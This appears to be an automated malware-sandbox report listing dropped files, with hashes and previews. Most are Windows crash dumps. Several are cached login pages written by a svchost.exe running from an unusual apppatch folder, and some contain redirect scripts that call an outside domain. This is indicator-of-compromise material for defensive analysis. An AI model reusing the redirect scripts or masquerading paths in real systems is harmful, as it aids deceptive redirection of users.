                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.2.8.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4583.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.597873646101092
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs+Jg77aI9RuWpW8VYtYm8M4Jw1GFWJI+q8r5FMTmfd:uIjf0I77P7VVJwVIcmTmfd
                                                                                                                                                                                                                  MD5:25D69E5B6C07BA8D71B496A5E7C848C0
                                                                                                                                                                                                                  SHA1:31B37FBB559AD15B42A3F3E2A6F41201938F182E
                                                                                                                                                                                                                  SHA-256:375D70ACD975992D339A447B1C23051518EB99F1A08701A9454ECBAC8ED61B9C
                                                                                                                                                                                                                  SHA-512:B34334BFC66C486B8B58FE5A42FB180729EB7B2814E472344C4836EC0B907447B37971BF4109E1B4CB42DAC9E70657439465ACE64A971106B60282B1C5DD65CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583734" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER480.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:04 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):584094
                                                                                                                                                                                                                  Entropy (8bit):1.5748549077788379
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:BH0sg/+slEmBxB/PeYMERHjJdhbWHKNyWFCPKDyls3TY2iWPcj:uH3tBv/Wf2DjMHKNyWEkHpiN
                                                                                                                                                                                                                  MD5:71F52FB587FD34D9F0A92F33A3062161
                                                                                                                                                                                                                  SHA1:B3C993706BA0C116B811D278792B7674F781B8BE
                                                                                                                                                                                                                  SHA-256:0561B7179AF1644383F990F86B8DEF49DF2A47E13DCC882827C4397EE857D1DA
                                                                                                                                                                                                                  SHA-512:84E3B5211883C870E539EE7AFF4BB8829F7D9A5D4F24352EFEDADB561374E2016EF994A85A35EF59929124B5F027960EBB2B12E9F1D8377F5496D32CB6C4DAC6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g........................8...........d...............T.......8...........T...........`i..>............+...........-..............................................................................eJ......H.......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4978.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:20 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114118
                                                                                                                                                                                                                  Entropy (8bit):1.740167141552656
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:zGPgO9RCPv5dHpB/AxmPTlODU1YdTFi9VJDv0/:zsgO9RCXJNME0dpiZS
                                                                                                                                                                                                                  MD5:50EADD179AC1113130AF219EAF26C979
                                                                                                                                                                                                                  SHA1:6CCC62C0FBFD1D620F6942FC5B99A95CA0882915
                                                                                                                                                                                                                  SHA-256:CDDFFAEDEAD44F5D3D24ABEAC35FB84BBAAB00DBEE08E69FBA9BE2D969A59715
                                                                                                                                                                                                                  SHA-512:17BBA4D380B07E625906BB0B2AB9CA836CD307E280E42903E8FED65E90C2AD3D79EEB540F5BC1FB27B2A8AFE84E970B836F1C1E4D897A8674E1D2231C07D48A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g............D...........D...L.......T..."J..........T.......8...........T...........x)..N.......................|...............................................................................eJ....... ......GenuineIntel............T.......8....C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B00.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8430
                                                                                                                                                                                                                  Entropy (8bit):3.713385094044531
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJJR76d6Y2DvSU9esgmf+KLprG89bvBsfHWKFm:R6lXJT6d6YySU9Vgmf9Jv6fHWx
                                                                                                                                                                                                                  MD5:6AA4C3ABE5C3FAAD566BC6751AC48E8A
                                                                                                                                                                                                                  SHA1:D4957C79CFA995E64C9662F0BC544FCF70425D23
                                                                                                                                                                                                                  SHA-256:72F4D6471FCC535EC3494D86E6AEFD044CBB6AAF39C8BC558EAB2B2C3B1A744B
                                                                                                                                                                                                                  SHA-512:2AF3982EFF34AE9C0A293004A9E6215587CEDB1F7DA834468C37377558847FC1D667270DE5DCA416E1D190A0CC9EB7F8F114EF6D6616FAF46077CFD589F524C9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.9.6.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B5F.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.59816273803339
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs+Jg77aI9RuWpW8VYPYm8M4Jw1GFD/+q8rOFMTm9d:uIjf0I77P7VfJw6/rmTm9d
                                                                                                                                                                                                                  MD5:4F215E8275EEC34826D71BF642D45BA1
                                                                                                                                                                                                                  SHA1:E033405FBA3EA1BCA0A3CB184FAC4EC8B9C98E96
                                                                                                                                                                                                                  SHA-256:25AC86546D0C287EDD79D9091B12EA479E4382D8AA9A0480512F607E91B7D050
                                                                                                                                                                                                                  SHA-512:6BD68E499BDC36FEE2097AD79B6606B6CD49858CA83DAAF0B33E76D5300983A3C8E59922B28398E55DBE14B3FB05D7E81E9885E4BC65D8CCBD3BE6F6C57AB5CF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583734" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DE.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:04 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):988316
                                                                                                                                                                                                                  Entropy (8bit):1.7131240883960135
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:hldScto6FivRxeAkb+3s9HQmskgIWjyxqAQvIJ+s43Hpyt2Wq0tY6weF43KiT:XA4o6Fao9HQmsqgyxq9gJ+s43JTk31iX
                                                                                                                                                                                                                  MD5:C0D40D97FC6EB2E72A555A632E30487F
                                                                                                                                                                                                                  SHA1:84EDE534E848A55BF6F69307EC6FE1C83A2F79D7
                                                                                                                                                                                                                  SHA-256:6E769A1DEB87674FEDAE17FF9DE19644583E0B79E1922ECE6E1C50C63AC12438
                                                                                                                                                                                                                  SHA-512:A1F02C85FA5A2BB6DC2E578DCDBDC7FA0CB494CB3BDF3D8DC90DBCC077126A64095F6C96F53840E421F66B424E75B0F2888947BB071C41BCBCA814146B74812C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g.....................................0...e..........T.......8...........T............t..............1...........3..............................................................................eJ......<4......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B9.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:04 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):845370
                                                                                                                                                                                                                  Entropy (8bit):1.6762508199950272
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:opKPQ95LeY5aQpVsE2PdcnuG32Mc2w4kVD/mFPCxHi25jpn17KwPKF71Dlhyto7U:opIQ95WQwEMcr64kVzHiYKQU715Rv
                                                                                                                                                                                                                  MD5:FEE434063C68BBCE4550127000772865
                                                                                                                                                                                                                  SHA1:084FE8CF77E7C4B45A1FAA19C006F47761D76782
                                                                                                                                                                                                                  SHA-256:4065EE6865918687988BC91B7D063A2A7ABC1A2B1AE207A44B8BB4E052776638
                                                                                                                                                                                                                  SHA-512:AA1F8432AB369D26A86A0614577D2F331E87AAD0893CDF7C6532CF2B45AD8DF4533F8CDA0730A3279C68E28AA2DB0948B7237A53506A07EB55E18190480FD60C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g............4...............<........%...J..........T.......8...........T............g..B~...........0...........1..............................................................................eJ.......2......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD4.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8444
                                                                                                                                                                                                                  Entropy (8bit):3.711755849069462
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJJRI6BZ6Y2DVSU9kHgLgmf+KLpra89bgQsfogm:R6lXJQ6BZ6YISU9Hgmf9FgjfW
                                                                                                                                                                                                                  MD5:E0C1D428AA38BFE7FCA00794806EA68A
                                                                                                                                                                                                                  SHA1:A57932CF2E831806BC2DA5D928A9A4690196733F
                                                                                                                                                                                                                  SHA-256:624027D952A0BFE4234B805F176AC0553E099355928EB0F5576A781DF649F3E8
                                                                                                                                                                                                                  SHA-512:7AD138080D2D96E43F65B79B30E328E763FD7DDC59F279AA079DDFEFEF1ED96B470B450260656F444D331439AF329D25484DD219BAB81252E5377137E69F2615
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA0.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.598889790700874
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYAYm8M4Jw1GFH+q8rtFMTmWd:uIjfZI77P7VQJwOAmTmWd
                                                                                                                                                                                                                  MD5:4DF840BFC1A1180D85923AFD73BC4910
                                                                                                                                                                                                                  SHA1:8BC95F5E768304CFD91CA87E0DCA0946097CAEFE
                                                                                                                                                                                                                  SHA-256:7C32A3D2B02D1D043719DA009CF4CE0861C9CB80B328B1E073132C5820B0D4D9
                                                                                                                                                                                                                  SHA-512:1FE2E078FD05EFE75CB34013870E08B164B74E0D4B60E763DD4FFDF7FCD4D9A0C481EF61E2AF94FE5BB04A26A046D887AB28BA2E06663E3FBE16D199DE5CB6DF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1F.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:06 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1015772
                                                                                                                                                                                                                  Entropy (8bit):1.7510087102413143
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:5DebQ7Hdq13qtfdjh8fwrN6fMRdceeByTr0nrqjNCWj2OT/9WqswjBJbWxeRqmOb:5DeOdqKf788RdcXc4rqJ2OTVlsEWFmJe
                                                                                                                                                                                                                  MD5:625F76B7A8D1BFE709CFBA09A9FD420A
                                                                                                                                                                                                                  SHA1:3BBAF7A3E61FC5CB94AC770114265F6BE4E5B3D6
                                                                                                                                                                                                                  SHA-256:3DEF42AB8CB5A8D99B1DE53BF1B9A558E73E891BA665F728C8F455DC0016CDF1
                                                                                                                                                                                                                  SHA-512:C726B6AAECC930B4350B111E0B4BFBC22D572CAB4F7BEE466B5D10083ED13375F4FCFC5EF47BA3BA7AFF1B1D65C4E8260F57C2D9DC32F3B31D30821874A97DDF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g............D...............L.......45...k..........T.......8...........T............q...............2...........4..............................................................................eJ.......4......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\login[3].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                  Entropy (8bit):4.470551863591405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                                  MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                                  SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                                  SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                                  SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[3].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):4.802925647778009
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                                  MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                                  SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                                  SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                                  SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[4].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                  Entropy (8bit):4.470551863591405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                                  MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                                  SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                                  SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                                  SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[5].htm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                  Entropy (8bit):4.749712087982617
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:q43t0t1Ah/QRmApC0M8SIXqlhphGIdPmHQhXlJEGmTAXfGb:T81Y/QDCL8ElgMRlyHTAPGb
                                                                                                                                                                                                                  MD5:47E7A4B4DAF650B709C93B18E23EB376
                                                                                                                                                                                                                  SHA1:D7A19DDAB1A9BB567F0E0279C44BBEBED3200C85
                                                                                                                                                                                                                  SHA-256:D74FBC8646719E8D2EB6C2D92A56FEA890358B9D57173746A5E6B658ABAAED59
                                                                                                                                                                                                                  SHA-512:2307A1BFF8B8938E8976EA64AF7A79E4B3D88256C19307F50033AA1418C535AF0FEA639B292940234427857C22738B90FA5B1651ACAB4A62C9271BED12665BDB
                                                                                                                                                                                                                  Malicious:false
